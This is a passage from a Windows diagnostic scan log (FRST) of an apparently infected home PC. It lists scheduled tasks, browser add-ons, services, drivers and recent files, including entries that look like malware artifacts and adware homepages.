Task: {D4B51A00-104D-48BC-9D4B-CF83A25366E5} - System32\Tasks\{2E3D2332-F591-4AC3-8C22-7B2CA38E767A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DAE812F0-3E36-458B-BDBB-6E14C42AA366} - System32\Tasks\AdwCleaner_onReboot => C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe [7623880 2019-09-01] (Malwarebytes Inc -> Malwarebytes)
Task: {FAA6E360-A72B-4E5F-87ED-CA34E8E5D5D2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-27] (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{DD68EF26-7605-461E-89EA-F338900C8CF6}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://es.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> E:\Archivos de Programa\jAVA-AC\bin\ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> E:\Archivos de Programa\jAVA-AC\bin\jp2ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Aplicación auxiliar de inicio de sesión en la cuenta Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2013-05-22] (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [File not signed]
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {DB131C55-60C8-4ADC-84DC-9E76AB06E2DC} -  No File
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies SA -> Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&from=cor&uid=SAMSUNGXHD103SJ_S246J90Z484516&ts=1372918643

FireFox:
========
FF DefaultProfile: 0uh69wgl.default-1567320513344
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 [2019-10-18]
FF Homepage: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF NewTab: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF Extension: (Mozilla Official) - C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2019-09-14] [not signed]
FF SearchPlugin: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\searchplugins\bing-lavasoft-ff59.xml [2019-09-01]
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Flickr\Flickr Uploadr\Profiles\4jx3zuz0.default [2013-06-24]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Kaspersky URL Advisor) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Virtual Keyboard) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Content Blocker) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Anti-Banner) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Safe Money) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\dtplugin\npDeployJava1.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\plugin2\npjp2.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1165635.dll [2012-07-05] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @wacom.com/wacom-plugin,version=1.1.0.10 -> C:\Program Files (x86)\TabletPlugins\npwacom.dll [2011-04-20] (Wacom, Inc.) [File not signed]
FF Plugin-x32: @wacom.com/wtPlugin,version=2.0.0.1 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [File not signed]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [File not signed]

Chrome: 
=======
CHR Profile: C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default [2019-10-18]
CHR Extension: (Presentaciones) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-09-01]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2019-09-01]
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-01]
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MREIDR~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2019-01-26]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx [2012-08-26]

Opera: 
=======
OPR DownloadDir: E:\Descargas
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (FVD Video Downloader) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [239616 2013-08-31] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\avp.exe [356128 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R2 EsgShKernel; C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe [11457840 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
S2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-12-12] (Huawei Technologies Co., Ltd. -> ) [File not signed]
S2 NitroDriverReadSpool11; E:\Pro11\NitroPDFDriverService11x64.exe [327368 2016-12-08] (Nitro Software, Inc. -> Nitro Software, Inc.)
S2 NitroUpdateService; E:\Pro11\Nitro_UpdateService.exe [419016 2016-12-08] (Nitro Software, Inc. -> )
S2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [71880 2016-12-08] (Nitro Software, Inc. -> Nalpeiron Ltd.)
S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG -> Nero AG)
S2 NMSAccess64; C:\Windows\SysWOW64\NMSAccess64.exe [82872 2009-01-12] (Numedia Soft, Inc. -> )
S2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2012-09-04] (Even Balance, Inc. -> )
S2 ShMonitor; C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe [512816 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
S2 SkypeUpdate; E:\Archivos de Programa\Skype\Updater\Updater.exe [172192 2013-10-23] (Skype Software Sarl -> Skype Technologies)
S2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 Windows Indexer; C:\Windows\SearchIndexer.exe [64512 2017-10-13] () [File not signed]
U2 YandexBrowserService; C:\Program Files (x86)\Yandex\YandexBrowser\19.7.2.455\service_update.exe [1596408 2019-08-01] (YANDEX LLC -> YANDEX LLC)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ab6af3c5e932269c; C:\Windows\system32\drivers\ab6af3c5e932269c.sys [33984 2019-09-01] (BlockChain Advances Ltd -> FsFilter Network)
R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [12528640 2013-08-31] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [618496 2013-08-31] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [32768 2010-04-29] (Microsoft Windows Hardware Compatibility Publisher -> Google Inc)
R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96256 2013-07-05] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2012-09-01] (DT Soft Ltd -> DT Soft Ltd)
R3 EnigmaFileMonDriver; C:\Windows\System32\drivers\EnigmaFileMonDriver.sys [68424 2019-10-18] (EnigmaSoft Limited -> EnigmaSoft Limited)
S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R1 ISODrive; E:\Archivos de Programa\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [90208 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [626272 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [54368 2013-06-19] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178448 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [66800 2013-01-17] (Logitech -> Logitech Inc.)
R3 nusb3hub; C:\Windows\System32\DRIVERS\nusb3hub.sys [96768 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 nusb3xhc; C:\Windows\System32\DRIVERS\nusb3xhc.sys [213504 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [187392 2009-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Corporation )
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2017-11-27] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 usbser; C:\Windows\System32\DRIVERS\USBSER.sys [33280 2018-12-12] (Microsoft Corporation) [File not signed]
S3 wacmoumonitor; C:\Windows\System32\DRIVERS\wacmoumonitor.sys [13312 2011-09-08] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
U3 MBAMService; no ImagePath
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-10-18 12:01 - 2019-10-18 12:01 - 000040347 _____ C:\Users\MrEidrian\Desktop\FRST.txt
2019-10-18 12:00 - 2019-10-18 12:00 - 001616384 _____ (Farbar) C:\Users\MrEidrian\Downloads\FRST64.exe
2019-10-18 12:00 - 2019-10-18 12:00 - 001616384 _____ (Farbar) C:\Users\MrEidrian\Desktop\FRST64.exe
2019-10-18 11:59 - 2019-10-18 11:59 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc
2019-10-18 11:56 - 2019-10-18 11:56 - 000003102 _____ C:\Windows\system32\Tasks\AdwCleaner_onReboot
2019-10-18 11:39 - 2019-10-18 11:39 - 000003192 _____ C:\Windows\system32\Tasks\csrss

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-10-18 12:01 - 2019-09-13 20:13 - 000000000 ____D C:\FRST
2019-10-18 11:59 - 2019-08-20 06:13 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-18 11:58 - 2016-12-02 09:26 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\Mozilla
2019-10-18 11:48 - 2012-06-25 17:19 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\Adobe
2019-10-18 11:48 - 2012-06-07 13:49 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-10-18 11:47 - 2011-01-22 12:38 - 000723256 _____ C:\Windows\system32\perfh00A.dat
2019-10-18 11:47 - 2011-01-22 12:38 - 000149330 _____ C:\Windows\system32\perfc00A.dat
2019-10-18 11:47 - 2009-07-14 07:13 - 001613422 _____ C:\Windows\system32\PerfStringBackup.INI
2019-10-18 11:47 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2019-10-18 11:46 - 2019-09-01 09:31 - 000004128 _____ C:\Windows\system32\Tasks\CCleaner Update
2019-10-18 11:46 - 2009-07-14 06:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-10-18 11:46 - 2009-07-14 06:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-10-18 11:39 - 2019-09-14 09:18 - 000068424 _____ (EnigmaSoft Limited) C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys
2019-10-18 11:37 - 2017-03-09 12:56 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-10-18 11:37 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT

==================== Files in the root of some directories ================

2019-09-01 10:14 - 2019-09-01 10:14 - 000265728 _____ () C:\Users\MrEidrian\3272741.exe
2019-09-01 10:14 - 2019-09-01 10:14 - 000265728 _____ () C:\Users\MrEidrian\4131620.exe
2019-09-01 10:54 - 2019-09-01 10:54 - 000265728 _____ () C:\Users\MrEidrian\4411038.exe
2019-09-01 10:54 - 2019-09-01 10:54 - 000265728 _____ () C:\Users\MrEidrian\5111029.exe
2013-10-07 08:13 - 2013-10-07 08:13 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato GIF de Adobe CS6
2013-10-08 10:02 - 2019-03-08 10:35 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato PNG de Adobe CS6
2012-09-23 18:25 - 2012-09-23 18:34 - 000000600 _____ () C:\Users\MrEidrian\AppData\Roaming\winscp.rnd
2012-11-04 22:33 - 2014-03-13 11:30 - 000001456 _____ () C:\Users\MrEidrian\AppData\Local\Adobe Guardar para Web 13.0 Prefs
2019-09-01 08:28 - 2019-09-01 08:28 - 008006656 _____ () C:\Users\MrEidrian\AppData\Local\agent.dat
2019-09-01 08:28 - 2019-09-01 08:28 - 000054272 _____ () C:\Users\MrEidrian\AppData\Local\ApplicationHosting.dat
2019-09-01 08:43 - 2019-09-01 08:43 - 000016896 _____ () C:\Users\MrEidrian\AppData\Local\clakem.dll
2019-09-01 08:28 - 2019-09-01 08:28 - 000070992 _____ () C:\Users\MrEidrian\AppData\Local\Config.xml
2013-03-30 12:06 - 2018-10-19 09:05 - 000012288 _____ () C:\Users\MrEidrian\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-02-18 13:05 - 2018-05-11 13:26 - 000534528 _____ (Dirección General de la Policía) C:\Users\MrEidrian\AppData\Local\DNIeService.exe
2019-09-01 08:28 - 2019-09-01 08:28 - 000140800 _____ () C:\Users\MrEidrian\AppData\Local\installer.dat
2019-09-01 08:28 - 2019-09-01 08:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\K-bam.exe
2019-09-01 08:28 - 2019-09-01 08:28 - 002047539 _____ () C:\Users\MrEidrian\AppData\Local\K-bam.tst
2015-08-08 09:12 - 2019-04-02 12:15 - 000004096 ____H () C:\Users\MrEidrian\AppData\Local\keyfile3.drm
2019-09-01 08:28 - 2019-09-01 08:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\lobby.dat
2019-09-01 08:28 - 2019-09-01 08:28 - 000005568 _____ () C:\Users\MrEidrian\AppData\Local\md.xml
2019-09-01 08:28 - 2019-09-01 08:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\noah.dat
